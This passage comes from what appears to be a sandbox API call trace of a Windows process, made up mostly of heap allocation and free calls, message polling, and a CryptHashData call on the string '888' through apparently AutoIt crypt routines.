hHeap=0x970000) returned 1 [0241.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0241.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0241.991] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0241.991] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0241.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0241.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0241.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0241.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0241.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0241.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0241.991] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0241.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0241.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0241.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0241.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0241.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0241.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0241.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0241.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0241.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0241.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0241.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0241.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f18 [0241.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0241.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0241.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0241.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0241.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0241.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0241.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0241.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0241.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0241.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0241.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0241.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0241.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0241.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0241.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0241.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0241.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0241.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0241.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0241.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0241.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0241.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0241.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0241.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0241.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0241.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0241.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0241.993] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0241.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0241.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0241.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0241.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0241.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0241.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0241.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0241.994] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0241.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0241.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0241.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0241.994] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.994] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0241.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0241.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0241.994] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0241.995] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0241.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0241.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e515b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0241.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0241.995] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0241.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0241.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.995] CryptHashData (hHash=0xa873d0, pbData=0x2e54f18, dwDataLen=0x3, dwFlags=0x1) returned 1 [0241.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0241.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0241.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0241.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0241.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0241.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0241.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0241.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0241.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0241.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0241.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0241.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0241.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0241.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0241.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0241.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0241.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0241.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0241.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0241.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0241.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0241.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0241.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0241.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0241.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0241.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0241.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0241.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0241.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0241.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0241.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0241.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0241.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0241.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0241.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0241.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0241.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0241.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0241.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0241.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0241.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0241.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0241.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0241.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0241.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0241.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0241.999] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0241.999] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0241.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0241.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0241.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0241.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04118 [0241.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0241.999] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0241.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0241.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513a0 [0241.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0241.999] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0241.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0241.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0241.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0241.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0242.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0242.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0242.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0242.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0242.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0242.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0242.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0242.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0242.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0242.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0242.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0242.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0242.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0242.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0242.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0242.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0242.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0242.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0242.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0242.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0242.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0242.000] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0242.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0242.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0242.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51550 [0242.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0242.001] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0242.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0242.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0242.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0242.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0242.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0242.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0242.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 